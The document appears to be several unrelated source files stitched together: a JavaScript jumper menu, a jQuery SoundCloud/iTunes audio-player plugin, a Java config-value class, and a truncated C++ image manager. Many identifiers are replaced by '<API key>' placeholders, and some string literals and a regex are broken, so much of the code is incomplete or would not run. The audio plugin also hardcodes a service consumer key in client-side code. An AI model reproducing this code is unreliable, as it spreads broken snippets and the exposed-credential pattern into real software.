var $el = $("#jumper_menu");
var this_view = null;
$el.menu({
select: <API key>
});
function show_menu(view) {
if(!view) {
console.log("show_menu called without passing a view");
}
this_view = view;
$el.menu("collapseAll", null, true);
<API key>();
$el.show().position({
my: "left top",
at: "left bottom",
of: view.$el.find('.jumper_menu_button'),
collision: "fit flip"
});
/* Clicking outside the menu closes it */
$(document).on("click", hide_menu);
$(document).on("keypress", hide_menu);
}
function hide_menu() {
$el.hide();
$(document).off("click");
$(document).off("keypress");
}
function <API key>() {
<API key>(
"clear",
this_view.model.id
);
<API key>(
"jumper_to_here",
<API key>()
);
<API key>(
"show_destination",
this_view.model.id
);
}
function <API key>() {
/* Returns true if this is valid as a "jumper to here" destination.
* Note this only allows us to jumper within the same frame.
*/
return (
sessionStorage.<API key> &&
(sessionStorage.<API key> != this_view.model.circuit.id) &&
sessionStorage.<API key> &&
(sessionStorage.<API key> == this_view.model.circuit.get("frame_id"))
);
}
function <API key>(action, t) {
var selector = "li[data-action='" + action + "']";
var elements = $el.find(selector);
if(t) {
elements.removeClass("ui-state-disabled");
}
else {
elements.addClass("ui-state-disabled");
}
}
function <API key>(e, jq_element) {
e.stopPropagation();
console.log(e.currentTarget.dataset.action, "action clicked");
hide_menu();
switch(e.currentTarget.dataset.action) {
case "clear" :
this_view.jumper_remove();
break;
case "jumper_from_here" :
jumper_from_here();
break;
case "jumper_to_here" :
jumper_to_here();
break;
case "show_destination" :
this_view.trigger("show_destination");
break;
}
}
function jumper_from_here() {
console.log("setting jumper source to:", this_view.model.circuit.id);
sessionStorage.<API key> = this_view.model.circuit.id;
sessionStorage.<API key> = this_view.model.circuit.get("frame_id");
}
function jumper_to_here() {
this_view.trigger("add_jumper", {
circuit_id: this_view.model.circuit.id,
jumper_id: this_view.model.id,
<API key>: sessionStorage.<API key>
});
sessionStorage.removeItem("<API key>");
sessionStorage.removeItem("<API key>");
}
console.log("loaded jumper_menu.js");
return {
show: show_menu
};
}); |
function loadUTAudio() {
// DEPENDENCIES
//loadJPlayer();
//loadUTAudioEngine();
UT.import('jPlayer');
UT.import('utAudioEngine');
(function ($) {
"use strict";
var methods = {
<API key>: -1,
init: function(options) {
this.each(function() {
var $that = $(this);
var that = {};
this.utAudio = that;
var events = {
ready: "utAudio:ready",
change: "utAudio:change",
buttonClick: "utAudio:buttonClick",
mediaAdd: "utAudio:mediaAdd",
mediaRemove: "utAudio:mediaRemove",
mediaReady: "utAudio:mediaReady",
timeUpdate: "utAudio:timeUpdate",
play: "utAudio:play",
pause: "utAudio:pause",
stop: "utAudio:stop",
finish: "utAudio:finish",
seek: "utAudio:seek",
error: "utAudio:error",
dialogOpen: "utAudio:dialogOpen",
dialogCancel: "utAudio:dialogCancel"
};
var defaults = {
data: undefined,
skin: 'bottom-over',
id: false,
ui: {
play: true,
progress:true,
time: true,
title: true,
source: true,
artwork: true
},
styles: {
autoPause: true,
listenMedia: true,
staticLink: false
},
editable: true,
i18n: {
add: "add sound",
change: "",
error: "Error occurred",
dialogLabel: undefined
}
};
if(!that.post && UT && UT.Expression && UT.Expression.ready){
UT.Expression.ready(function(post){
that.post = post;
if(that.initialized) {
setTimeout(function() {
that.update();
$that.trigger(events.ready, {id:that.options.id, data:that.options.data});
}, 0);
that.addMediaListener();
}
});
}
that.options = $.extend(true, defaults, options);
that.isTouch = (('ontouchstart' in window) || (window.navigator.msMaxTouchPoints > 0));
that.sckey = 'T8Yki6U2061gLUkWvLA';
that.<API key> = false;
that.eventNS = '';
that.storageNS = 'utAudio_';
that.stateNS = "ut-audio-state";
that.editableNS= "ut-audio-editable";
that.uiNS = "ut-audio-ui";
that.modeNS = "ut-audio-mode";
that.skinNS = "ut-audio-skin";
that.serviceNS = "ut-audio-service";
that.aspectNS = "ut-audio-aspect";
that.sizeNS = "ut-audio-size";
that.touchNS = "ut-audio-touch";
if(that.options.ui === false || that.options.ui === true){
var v = that.options.ui;
that.options.ui = {
play: v,
progress:v,
time: v,
title: v,
source: v,
artwork: v
};
}
that.addMediaListener = function() {
if(methods.<API key> < 0 && that.options.styles.listenMedia) {
that.post.on('sound',function(data) {
var obj = $(that.post.node);
var allPanels = obj.find(".ut-audio");
var tmp = null;
for(var qq = 0; qq < allPanels.length; qq++) {
var ww = (qq + methods.<API key>) % (allPanels.length);
if(allPanels[ww] && allPanels[ww].utAudio && allPanels[ww].utAudio.options && !allPanels[ww].utAudio.options.data) {
tmp = allPanels[ww];
break;
}
}
if(!tmp) {
tmp = allPanels[(methods.<API key>++) % (allPanels.length)];
}
if(tmp) {
tmp.utAudio.options.data = data;
tmp.utAudio.update();
}
});
methods.<API key> = 0;
}
};
that.<API key> = function(newOptions, oldOptions) {
var diff = {newValue:{},oldValue:{}};
var noDiff = {newValue:undefined,oldValue:undefined};
$.each(newOptions, function(i){
if(!(newOptions[i] === oldOptions[i] || (typeof(newOptions[i]) === 'object' && typeof(oldOptions[i]) === 'object' && JSON.stringify(newOptions[i]) === JSON.stringify(oldOptions[i])))){
diff.newValue[i] = newOptions[i];
diff.oldValue[i] = oldOptions[i];
}
});
return $.isEmptyObject(diff.newValue)?noDiff:diff;
};
that.triggerChangeEvent = function(){
var diff = that.<API key>(that.options, that.oldOptions);
$that.trigger(events.change, diff.newValue, diff.oldValue);
that.oldOptions = $.extend(true, {}, that.options);
};
that.<API key> = function(url, callback) {
var apiUrl = (document.location.protocol === 'https:' || (/^h ttps/i).test(url) ? 'https' : 'http') + '://api.soundcloud.com/resolve?url=' + url + '&format=json&consumer_key=' + that.sckey + '&callback=?';
$.getJSON(apiUrl, function(data) {
callback.call(this, data);
});
};
that.<API key> = function(url,callback) {
var id = false;
var parts = url.split('i=');
if(parts[1]){
id = parseInt(parts[1].split('&')[0].split('?')[0].split(':')[0],10);
}
var serchInStore = function(id, country, successCallback, errorCallback){
var apiUrl = (document.location.protocol === 'https:' || (/^https/i).test(url) ? 'https' : 'http') + '://itunes.apple.com/lookup?media=music&country=' + country + '&id=' + id + '&callback=?';
$.getJSON(apiUrl, function(data) {
if(data && data.results && data.results[0]){
successCallback.call(this, data.results[0]);
} else {
errorCallback.call(this, country);
}
});
};
var canNotFind = function(country){
that.setState('error');
if(console && console.warn){
console.warn("utAaudio can't find the url=" + url + " with id=" + id + " in " + country + " itunes music store");
}
};
var canFind = function(data){
callback.call(this,data);
};
//here we search in UK and US stores
serchInStore(id,'US',canFind,function(country){
canNotFind(country);
serchInStore(id,'GB',canFind,function(country){
canNotFind(country);
});
});
};
that.setState = function(state) {
that.currents.state = state;
that.ui.container.removeClass().addClass(
[
that.uiNS,
that.stateNS + '-' + state,
that.editableNS + '-' + ((that.options.editable && !that.post.context.player) ? "true" : "false"),
(that.currents.serviceData?(that.serviceNS + "-" + that.currents.serviceData.service_name) : ""),
that.skinNS + '-' + that.options.skin,
that.modeNS + '-' +(that.post.context.player ? "player" : "editor"),
that.aspectNS + '-' + that.aspect,
that.sizeNS + '-' + that.size,
that.touchNS + '-' + (that.isTouch ? "true" : "false"),
'<API key>'
].join(' ')
);
};
that.setPlayPos = function(ms, <API key>) {
if(that.<API key> && <API key>) {
return false;
}
if(ms < 0 || !that.currents.serviceData) {
return false;
}
if(ms > that.currents.serviceData.duration) {
ms = that.currents.serviceData.duration;
}
if(that.ui.progress){
that.ui.progress.find('.' + that.uiNS + '-progress-playing').css("width", ((ms / that.currents.serviceData.duration) * 100) + "%");
}
var timeInSeconds = Math.round(ms / 1000);
if(ms > 0 || ms === -1){
$that.trigger(events.timeUpdate, timeInSeconds);
}
if(that.currents.serviceData && that.currents.serviceData.duration) {
var ts = '<span class="'+that.uiNS+'-<API key>">'+that.formatTime(ms) + '</span><span class="'+that.uiNS+'-progress-time-left">' + that.formatTime(that.currents.serviceData.duration) + '</span>';
if(that.ui.time){
that.ui.time.html(ts);
}
} else {
if(that.ui.time){
that.ui.time.html("");
}
}
that.<API key> = true;
setTimeout(function(){
if(that){
that.<API key> = false;
}
}, 1000);
return true;
};
that.formatTime = function(ms) {
var hms = {
h: Math.floor(ms / (60 * 60 * 1000)),
m: Math.floor((ms / 60000) % 60),
s: Math.floor((ms / 1000) % 60)
}, tc = [];
if (hms.h > 0) {
tc.push(hms.h);
}
tc.push((hms.m < 10 && hms.h > 0 ? '0' + hms.m : hms.m));
tc.push((hms.s < 10 ? '0' + hms.s : hms.s));
return tc.join(':');
};
that.updateUiContent = function() {
var sed = that.currents.serviceData || {};
if(that.ui.artwork && sed.artwork_url) {
var img = new window.Image();
img.onload = function(){
that.ui.artwork.css("backgroundImage", "url(" + sed.artwork_url + ")");
};
img.src = sed.artwork_url;
}
if(that.ui.play) {
that.ui.play.html('<span class="icon_spinner '+that.uiNS+'-seek-icon"></span><span class="icon_play '+that.uiNS+'-play-icon"></span><span class="icon_pause '+that.uiNS+'-pause-icon"></span>');
that.ui.play.on('click',function() {
if(that.currents.state !== 'launch' && that.currents.state !== 'finish' && that.currents.state !== 'pause'){
that.utPause();
} else {
that.utPlay();
}
});
that.ui.play.on('touchend',function(){});
that.ui.play.on('touchstart',function(){});
}
if(that.ui.title) {
that.ui.title.html(sed.title || '');
that.ui.title.off('click').on('click', function (e) {
e.stopPropagation();
});
}
if(that.ui.error) {
that.ui.error.html("<div>" + (that.options.i18n.error || "Error") + "</div>");
that.ui.error.off('click').on('click', function (event) {
event.stopPropagation();
event.preventDefault();
that.setState("launch");
});
}
if(that.ui.progress) {
that.ui.progress
.html('<span class="'+that.uiNS+'-progress-playing"></span><span class="'+that.uiNS+'-progress-marker"><span class="'+that.uiNS+'-<API key>"></span><span class="'+that.uiNS+'-progress-time">');
}
if(!that.isTouch && that.ui.progress) {
that.ui.progress
.off('mouseenter')
.on('mouseenter', function(){
if(that.currents.state === 'play' || that.currents.state === 'pause'){
that.ui.progress.find('.'+that.uiNS+'-progress-marker').addClass(that.uiNS+'-<API key>');
}
})
.off('mouseleave')
.on('mouseleave', function(){
that.ui.progress.find('.'+that.uiNS+'-progress-marker').removeClass(that.uiNS+'-<API key>');
})
.off('mousemove')
.on('mousemove', function(e){
var pos = e.pageX - that.ui.progress.offset().left;
var time = (that.currents.serviceData.duration || 0)/that.ui.progress.width() * pos;
that.ui.progress.find('.'+that.uiNS+'-progress-marker').css('left',pos + 'px');
that.ui.progress.find('.'+that.uiNS+'-<API key>').html(that.formatTime(time));
});
}
var _seekPlay = function(e) {
var oo = that.ui.progress.offset();
var px = e.pageX ? e.pageX : (e.originalEvent && e.originalEvent.pageX ? e.originalEvent.pageX : (e.originalEvent.touches && e.originalEvent.touches[0] && e.originalEvent.touches[0].pageX ? e.originalEvent.touches[0].pageX : 0));
var pos = (px - parseInt(oo.left, 10))/that.ui.progress.width();
if(that.currents.state === 'play' || that.currents.state === 'pause'){
$that.utAudioEngine("seek", pos);
}
};
if(that.ui.progress){
that.ui.progress.on("touchstart mousedown", function(e) {
_seekPlay(e);
});
}
if(that.ui.source) {
that.ui.source
.html('<span class="icon_'+sed.service_name +' '+that.uiNS+'-source-icon"></span>')
.prop('target','_blank')
.prop('title','listen on '+sed.service_name);
}
if(that.ui.source) {
that.ui.source.prop('href',that.options.styles.staticLink ? that.options.styles.staticLink : sed.source);
}
that.setPlayPos(0);
};
that.seek = function(pos) {
if(that.currents.state === 'play' || that.currents.state === 'pause'){
$that.utAudioEngine("seek", pos);
}
};
that.getServiceName = function(){
if(that.options.data && that.options.data.service) {
return that.options.data.service;
} else {
if(that.options.data && that.options.data.url && that.options.data.url.toLowerCase().indexOf('soundcloud') !== -1) {
return 'soundcloud';
} else if(that.options.data && that.options.data.url && that.options.data.url.toLowerCase().indexOf('itunes.apple') !== -1) {
return 'itunes';
} else {
var error = 'Something went wrong with defining service name that you want to play';
console.error(error, that.options.data);
that.setState('error', error);
return false;
}
}
};
that.formatServiceData = function(data) {
if (that.getServiceName() === 'soundcloud') {
that.currents.serviceData = {
title: data.title,
source: data.permalink_url,
artwork_url: (data.artwork_url ? data.artwork_url : '').replace(/\-large\./ig, "-t500x500."),
duration: data.duration,
artist: (data.user && data.user.username ? data.user.username : ""),
trackName: data.title
};
} else if(that.getServiceName() === 'itunes') {
that.currents.serviceData = {
title: data.artistName + ' - ' + data.trackName,
source: data.trackViewUrl,
artwork_url: (data.artworkUrl100 ? data.artworkUrl100 : '').replace("100x100","600x600"),
duration: 30000,
artist: data.artistName,
trackName: data.trackName
};
}
that.currents.serviceData.service_name = that.getServiceName();
};
that.requestServiceData = function(callback) {
var errorTimeOut = setTimeout(function(){
if(that && (!that.currents || !that.currents.serviceData)){
that.setState('error', "We can't get data to play this track in 15 sec");
}
}, 15000);
if(that.options.data.appData){
clearTimeout(errorTimeOut);
callback(that.options.data.appData);
} else if (that.getServiceName() === 'soundcloud') {
that.<API key>(that.options.data.url, function(data) {
clearTimeout(errorTimeOut);
callback(data);
});
} else if (that.getServiceName() === 'itunes') {
that.<API key>(that.options.data.url, function(data) {
clearTimeout(errorTimeOut);
callback(data);
});
}
};
that.<API key> = function(data) {
var type, url;
if (that.getServiceName() === 'soundcloud') {
var uri = data.stream_url;// ? data.stream_url : data.uri;
url = uri + (/\?/.test(uri) ? '&' : '?') + 'consumer_key=' + that.sckey;
type = "mp3";
} else {
url = data.previewUrl;
type = "m4a";
}
that.formatServiceData(data);
that.<API key> = {
duration: that.currents.serviceData && that.currents.serviceData.duration ? that.currents.serviceData.duration : false,
url: url,
type: type,
// autoPause: that.options.styles.autoPause,
onReady: function() {
that.setPlayPos(0);
},
onPlay: function() {
// if(that.post && that.post.stopAllOther && that.options.styles.autoPause) {
// that.post.stopAllOther();
that.setState('play');
$that.trigger(events.play);
},
onPause: function() {
that.setState('pause');
$that.trigger(events.pause);
},
onStop: function() {
that.setState('finish');
$that.trigger(events.stop);
that.setPlayPos(0);
},
onFinish: function() {
that.setState('finish');
$that.trigger(events.finish);
that.setPlayPos(0);
},
onSeekStart: function() {
if(that.currents.state !== "launch" && that.currents.state !== "finish" && that.currents.state !== "empty") {
that.setState('seek');
$that.trigger(events.seek);
}
},
onSeekEnd: function() {
if(that.currents.state !== "launch" && that.currents.state !== "finish" && that.currents.state !== "empty") {
// if(that.post && that.post.stopAllOther && that.options.styles.autoPause) {
// that.post.stopAllOther();
that.setState("play");
}
},
onTimeUpdate: function(pos) {
that.setPlayPos(pos, true);
},
onError: function(message) {
$that.trigger(events.error, message);
that.setState('error');
}
};
that.updateUiContent();
if($that.utAudioEngine) {
that.setState('launch');
$that.utAudioEngine(that.<API key>);
setTimeout(function() {
$that.trigger(events.mediaReady, that.currents.serviceData);
that.triggerChangeEvent();
}, 10);
} else {
that.setState("error", "Sound Player !!! The library not found.");
}
};
that.update = function(){
that.currents = {
id: that.options.id || $that.attr('id'),
sourceEmbedData: null,
state: 'loading'
};
$that.addClass("ut-audio");
var storage_data = that.post.storage[that.storageNS+that.currents.id];
if(storage_data && !that.options.data) {
that.options.data = JSON.parse(storage_data);
}
if(typeof(that.options.data) === 'string') {
that.options.data = {url:that.options.data};
}
if(!that.currents.id) {
console.error('utAudio: Please specify an id of your audio container. Example: "<div id="myPlayer1"></div>"');
return;
} else if($('[id="'+that.currents.id+'"]').length > 1){
console.error('utAudio: Your audio container should have unique id. Now, more then one element have id = ',that.currents.id);
return;
}
if($that.utAudioEngine) {
that.utStop();
}
that.ui = {};
if($that.css('position') !== "relative" && $that.css('position') !== "absolute"){
$that.css('position','relative');
if(console && console.warn) {
console.warn('Your container (id='+that.currents.id+') css position was set as "relative" as requirement of utAudio component. You can set it "absolute" or "relative" in the css to avoid this warning in console');
}
}
$that.find('.'+that.uiNS).remove();
that.ui.container = $('<div class="'+that.uiNS+'"></div>').appendTo($that);
that.ui.error = $('<div class="'+that.uiNS+'-error"></div>').appendTo(that.ui.container);
that.ui.loading = $('<div class="'+that.uiNS+'-loading"></div>').append('<div class="icon_spinner '+that.uiNS+'-error-icon"></div>').appendTo(that.ui.container);
if(that.options.ui.artwork) { that.ui.artwork = $('<div class="'+that.uiNS+'-artwork">' ).appendTo(that.ui.container);}
if(that.options.ui.title) { that.ui.title = $('<div class="'+that.uiNS+'-title">' ).appendTo(that.ui.container);}
if(that.options.ui.play) { that.ui.play = $('<div class="'+that.uiNS+'-play needsclick">' ).appendTo(that.ui.container);}
if(that.options.ui.progress) { that.ui.progress = $('<div class="'+that.uiNS+'-progress">' ).appendTo(that.ui.container);}
if(that.options.ui.time) { that.ui.time = $('<div class="'+that.uiNS+'-time">' ).appendTo(that.ui.container);}
if(that.options.ui.source) { that.ui.source = $('<a class="'+that.uiNS+'-source">' ).appendTo(that.ui.container);}
if(that.options.editable) {
that.ui.add = $('<a class="'+that.uiNS+'-add icon_sound ut-media-button ut-button"></a>')
.html(that.options.i18n.add)
.appendTo(that.ui.container)
.on('click', that.onAddClick);
that.ui.remove = $('<a class="'+that.uiNS+'-remove icon_trash"></a>')
.html(that.options.i18n.change)
.appendTo(that.ui.container)
.on('click', that.onRemoveClick);
}
that.aspect = 'square'; //TODO - make it more clear
if($that.width() > $that.height()*1.25) { that.aspect = 'horizontal'; }
if($that.width()*1.25 < $that.height()) { that.aspect = 'vertical'; }
that.size = 'middle'; //TODO - make it more clear
if($that.width() > 300 || $that.height() > 300) { that.size = 'big'; }
if($that.width() <= 200 || $that.height() <= 200) { that.size = 'small'; }
if(that.post) {
that.post.on('pause',that.utPause);
}
if(that.options.data && (that.options.data.appData || that.options.data.url)) {
that.setState("loading");
that.requestServiceData(that.<API key>);
} else {
that.setState("empty");
}
};
that.onAddClick = function(event) {
var ev = $.Event(events.buttonClick);
$that.trigger(ev, "add");
if(!ev.isDefaultPrevented()) {
that.utDialog({});
event.stopPropagation();
event.preventDefault();
}
};
that.onRemoveClick = function(event) {
var ev = $.Event(events.buttonClick);
$that.trigger(ev, "remove");
if(!ev.isDefaultPrevented()) {
event.stopPropagation();
event.preventDefault();
that.utDialog({});
}
};
that.utEmpty = function() {
that.post.storage[that.storageNS+that.currents.id] = null;
that.post.save();
that.options.data = null;
that.update();
};
that.utPlay = function(v) {
if(that.post && that.post.stopAllOther && that.options.styles.autoPause) {
that.post.stopAllOther();
}
that.setState("seek");
if($that.utAudioEngine) {
$that.utAudioEngine("play", v);
}
};
that.utPause = function() {
if($that.utAudioEngine) {
$that.utAudioEngine("pause");
}
};
that.utStop = function() {
if($that.utAudioEngine) {
$that.utAudioEngine("stop");
}
that.setPlayPos(-1);
};
that.utVolume = function(v) {
if($that.utAudioEngine) {
$that.utAudioEngine("volume", v);
}
};
that.utDestroy = function() {
that.post.storage[that.storageNS+that.currents.id] = null;
that.post.save();
$that.empty();
that = null;
};
that.utUpdate = function() {
that.update();
};
that.utDialog = function(opt) {
var options = {
inputTypes: ['search'],
label: that.options.i18n.dialogLabel
};
if(!$.isEmptyObject(opt)) {
options = $.extend(true, options, opt);
}
$that.trigger(events.dialogOpen);
that.post.dialog("sound", options, function(data) {
if(!data){
$that.trigger(events.dialogCancel);
} else {
that.options.data = data;
that.update();
that.post.storage[that.storageNS+that.currents.id] = JSON.stringify(data);
that.post.save();
$that.trigger(events.mediaAdd);
}
}, function(){
$that.trigger(events.dialogCancel);
});
};
that.listenMedia = function(isAllow) {
if(isAllow) {
that.options.styles.listenMedia = true;
that.addMediaListener();
} else {
that.options.styles.listenMedia = false;
that.post.off('sound');
methods.<API key> = -1;
}
};
that.oldOptions = $.extend(true, {}, that.options);
that.initialized = true;
if(that.post) {
setTimeout(function() {
that.update();
$that.trigger(events.ready, {id:that.options.id, data:that.options.data});
}, 0);
that.addMediaListener();
}
});
return this;
},
empty: function() {
this.each(function() {
if(this.utAudio) {
this.utAudio.utEmpty.call(this);
}
});
return this;
},
play: function(v) {
this.each(function() {
if(this.utAudio) {
this.utAudio.utPlay.call(this,v);
}
});
return this;
},
pause: function() {
this.each(function() {
if(this.utAudio) {
this.utAudio.utPause.call(this);
}
});
return this;
},
stop: function() {
this.each(function() {
if(this.utAudio) {
this.utAudio.utStop.call(this);
}
});
return this;
},
seek: function(pos) {
this.each(function() {
if(this.utAudio) {
this.utAudio.seek.call(this, pos);
}
});
return this;
},
volume: function(v) {
this.each(function() {
if(this.utAudio) {
this.utAudio.utVolume.call(this,v);
}
});
return this;
},
update: function() {
this.each(function() {
if(this.utAudio && this.utAudio.utUpdate){
this.utAudio.utUpdate.call(this);
}
});
return this;
},
remove: function() {
methods.destroy.apply(this, arguments);
},
destroy: function() {
this.each(function() {
if(this.utAudio) {
this.utAudio.utDestroy.call(this);
}
});
return this;
},
dialog: function(options) {
this.each(function() {
if(this.utAudio) {
this.utAudio.utDialog.call(this, options);
}
});
return this;
},
listenMedia: function(isAllow) {
this.each(function() {
if(this.utAudio) {
this.utAudio.listenMedia.call(this, isAllow);
}
});
return this;
}
};
$.fn.utAudio = function(method) {
if (methods[method]) {
return methods[method].apply(this, Array.prototype.slice.call(arguments, 1));
} else if (typeof method === 'object' || !method) {
methods.init.apply(this, arguments);
} else {
$.error('Method ' + method + ' does not exist on $.utAudio');
}
return this;
};
})(window.$ || window.Zepto || window.jq);
} |
package aphelion.shared.gameconfig;
import aphelion.shared.swissarmyknife.WeakList;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
/**
*
*
* @author Joris
*/
public abstract class <API key>
{
final ConfigSelection selection;
final String key;
protected boolean set;
private final WeakList<ChangeListener> listeners = new WeakList<>();
<API key>(@Nonnull ConfigSelection selection, @Nonnull String key)
{
this.selection = selection;
this.key = key;
}
public boolean isSet()
{
return set;
}
protected final void fireChangeListener()
{
for (ChangeListener listener : listeners)
{
listener.<API key>(this);
}
}
public void <API key>(@Nonnull ChangeListener listener)
{
listeners.cleanup();
listeners.add(listener);
}
public void <API key>(@Nonnull ChangeListener listener)
{
<API key>(listener);
listener.<API key>(this);
}
public void <API key>(@Nullable ChangeListener listener)
{
listeners.remove(listener);
listeners.cleanup();
}
/** A new value is coming from yaml.
* @return true if the new value is different from the old one
*/
abstract boolean newValue(@Nullable Object value);
public static interface ChangeListener
{
void <API key>(@Nonnull <API key> val);
}
public static interface Factory
{
<API key> create(@Nonnull ConfigSelection selection, @Nonnull String key);
}
} |
#pragma once
#include "math.h"
#include "CalculatorCRC32.h"
#include "../../Common/DocxFormat/Source/SystemUtility/File.h"
#include "FontPicker.h"
using namespace NSFontCutter;
#ifndef AVSINLINE
#define AVSINLINE __forceinline
#endif
#include "../../<API key>/PPTXWriter/FileDownloader.h"
#include "WMFToImageConverter.h"
#include "../../Common/MediaFormatDefine.h"
namespace NSShapeImageGen
{
const long c_nMaxImageSize = 2000;
static BOOL _CopyFile(CString strExists, CString strNew, LPPROGRESS_ROUTINE lpFunc, LPVOID lpData)
{
::DeleteFile(strNew);
return ::CopyFileEx(strExists, strNew, lpFunc, lpData, FALSE, 0);
}
enum ImageType
{
itJPG = 0,
itPNG = 1,
itVIF = 2,
itWMF = 3,
itEMF = 4
};
class CImageInfo
{
public:
NSShapeImageGen::ImageType m_eType;
LONG m_lID;
bool m_bValid;
CImageInfo()
{
m_eType = itJPG;
m_lID = -1;
m_bValid = true;
}
CImageInfo(const CImageInfo& oSrc)
{
*this = oSrc;
}
CImageInfo& operator=(const CImageInfo& oSrc)
{
m_eType = oSrc.m_eType;
m_lID = oSrc.m_lID;
m_bValid = oSrc.m_bValid;
return *this;
}
AVSINLINE CString GetPath(const CString& strMedia)
{
CString strExt = _T("");
strExt.Format(_T("\\image%d.%s"), m_lID, (itJPG == m_eType) ? _T("jpg") : _T("png"));
return strMedia + strExt;
}
AVSINLINE CString GetPath2()
{
CString _strExt = _T("png");
switch (m_eType)
{
case itJPG:
_strExt = _T("jpg");
break;
case itWMF:
_strExt = _T("wmf");
break;
case itEMF:
_strExt = _T("emf");
break;
default:
break;
}
CString strExt = _T("");
strExt.Format(_T("image%d.%s"), m_lID, _strExt);
return strExt;
}
};
class CImageManager
{
public:
CAtlMap<CString, CImageInfo> m_mapImagesFile;
CAtlMap<DWORD, CImageInfo> m_mapImageData;
CAtlArray<void*> m_listDrawings;
CAtlList<CImageInfo> m_listImages;
CString m_strDstMedia;
LONG m_lMaxSizeImage;
LONG m_lNextIDImage;
CCalculatorCRC32 m_oCRC;
LONG m_lDstFormat;
#ifdef <API key>
<API key>::CImageExt m_oExt;
#endif
public:
CImageManager()
{
m_strDstMedia = _T("");
m_lMaxSizeImage = c_nMaxImageSize;
m_lNextIDImage = 0;
m_lDstFormat = 0;
}
AVSINLINE void NewDocument()
{
m_strDstMedia = _T("");
m_lMaxSizeImage = 800;
m_lNextIDImage = 0;
m_mapImageData.RemoveAll();
m_mapImagesFile.RemoveAll();
m_listImages.RemoveAll();
}
public:
template <typename T>
void Serialize(T* pWriter)
{
pWriter->WriteINT(m_lMaxSizeImage);
pWriter->WriteINT(m_lNextIDImage);
pWriter->WriteINT(m_lDstFormat);
pWriter->WriteString(m_strDstMedia);
int lCount = (int)m_mapImagesFile.GetCount();
pWriter->WriteINT(lCount);
POSITION pos = m_mapImagesFile.GetStartPosition();
while (NULL != pos)
{
CAtlMap<CString, CImageInfo>::CPair* pPair = m_mapImagesFile.GetNext(pos);
pWriter->WriteString(pPair->m_key);
pWriter->WriteINT((int)pPair->m_value.m_eType);
pWriter->WriteINT((int)pPair->m_value.m_lID);
pWriter->WriteBYTE(pPair->m_value.m_bValid ? 1 : 0);
}
lCount = (int)m_mapImageData.GetCount();
pWriter->WriteINT(lCount);
pos = m_mapImageData.GetStartPosition();
while (NULL != pos)
{
CAtlMap<DWORD, CImageInfo>::CPair* pPair = m_mapImageData.GetNext(pos);
pWriter->WriteULONG(pPair->m_key);
pWriter->WriteINT((int)pPair->m_value.m_eType);
pWriter->WriteINT((int)pPair->m_value.m_lID);
pWriter->WriteBYTE(pPair->m_value.m_bValid ? 1 : 0);
}
}
template <typename T>
void Deserialize(T* pReader)
{
m_lMaxSizeImage = pReader->GetLong();
m_lNextIDImage = pReader->GetLong();
m_lDstFormat = pReader->GetLong();
m_strDstMedia = pReader->GetString2();
m_mapImageData.RemoveAll();
m_mapImagesFile.RemoveAll();
LONG lCount = pReader->GetLong();
for (LONG i = 0; i < lCount; ++i)
{
CString sKey = pReader->GetString2();
CImageInfo oInfo;
oInfo.m_eType = (NSShapeImageGen::ImageType)pReader->GetLong();
oInfo.m_lID = pReader->GetLong();
oInfo.m_bValid = pReader->GetBool();
m_mapImagesFile.SetAt(sKey, oInfo);
}
lCount = pReader->GetLong();
for (LONG i = 0; i < lCount; ++i)
{
DWORD dwKey = (DWORD)pReader->GetULong();
CImageInfo oInfo;
oInfo.m_eType = (NSShapeImageGen::ImageType)pReader->GetLong();
oInfo.m_lID = pReader->GetLong();
oInfo.m_bValid = pReader->GetBool();
m_mapImageData.SetAt(dwKey, oInfo);
}
}
public:
CImageInfo WriteImage(IUnknown* punkImage, double& x, double& y, double& width, double& height)
{
CImageInfo info;
if (NULL == punkImage)
return info;
if (height < 0)
{
FlipY(punkImage);
height = -height;
y -= height;
}
return GenerateImageID(punkImage, max(1.0, width), max(1.0, height));
}
CImageInfo WriteImage(CString& strFile, double& x, double& y, double& width, double& height)
{
bool bIsDownload = false;
int n1 = strFile.Find(_T("www"));
int n2 = strFile.Find(_T("http"));
int n3 = strFile.Find(_T("ftp"));
int n4 = strFile.Find(_T("https"));
if (((n1 >= 0) && (n1 < 10)) || ((n2 >= 0) && (n2 < 10)) || ((n3 >= 0) && (n3 < 10)) || ((n4 >= 0) && (n4 < 10)))
bIsDownload = true;
if (bIsDownload)
{
CString strFile1 = strFile;
strFile1.Replace(_T("\\"), _T("/"));
strFile1.Replace(_T("http:/"), _T("http:
strFile1.Replace(_T("https:/"), _T("https:
strFile1.Replace(_T("ftp:/"), _T("ftp:
CImageInfo oInfo;
CAtlMap<CString, CImageInfo>::CPair* pPair = m_mapImagesFile.Lookup(strFile1);
if (pPair != NULL)
return pPair->m_value;
CString strDownload = _T("");
CFileDownloader oDownloader(strFile1, TRUE);
oDownloader.Start( 1 );
while ( oDownloader.IsRunned() )
{
::Sleep( 10 );
}
if ( oDownloader.IsFileDownloaded() )
strDownload = oDownloader.GetFilePath();
return GenerateImageID_2(strDownload, strFile1, max(1.0, width), max(1.0, height));
}
CImageInfo info;
CFile oFile;
if (S_OK != oFile.OpenFile(strFile))
return info;
oFile.CloseFile();
if (-1 == width && -1 == height)
return GenerateImageID(strFile, width, height);
return GenerateImageID(strFile, max(1.0, width), max(1.0, height));
}
protected:
inline void CopyFile(CString& strFileSrc, CString& strFileDst)
{
_CopyFile(strFileSrc, strFileDst, NULL, NULL);
}
#ifdef <API key>
static IUnknown* CreateEmptyImage(int nWidth, int nHeight, BOOL bFlipVertical = TRUE)
{
if (nWidth < 1 || nHeight < 1)
return NULL;
MediaCore::<API key>* pMediaData = NULL;
CoCreateInstance(MediaCore::<API key>, NULL, CLSCTX_ALL, MediaCore::<API key>, (void**)(&pMediaData));
if (NULL == pMediaData)
return NULL;
if (bFlipVertical)
pMediaData->put_ColorSpace(CSP_BGRA | CSP_VFLIP);
else
pMediaData->put_ColorSpace(CSP_BGRA);
pMediaData->put_Width(nWidth);
pMediaData->put_Height(nHeight);
pMediaData->put_AspectRatioX(nWidth);
pMediaData->put_AspectRatioY(nHeight);
pMediaData->put_Interlaced(VARIANT_FALSE);
pMediaData->put_Stride(0, 4*nWidth);
pMediaData->AllocateBuffer(4*nWidth*nHeight);
BYTE* pBufferPtr = 0;
long nCreatedBufferSize = 0;
pMediaData->get_Buffer(&pBufferPtr);
pMediaData->get_BufferSize(&nCreatedBufferSize);
pMediaData->put_Plane(0, pBufferPtr);
if (!pBufferPtr || nCreatedBufferSize != 4*nWidth*nHeight)
{
RELEASEINTERFACE(pMediaData);
return NULL;
}
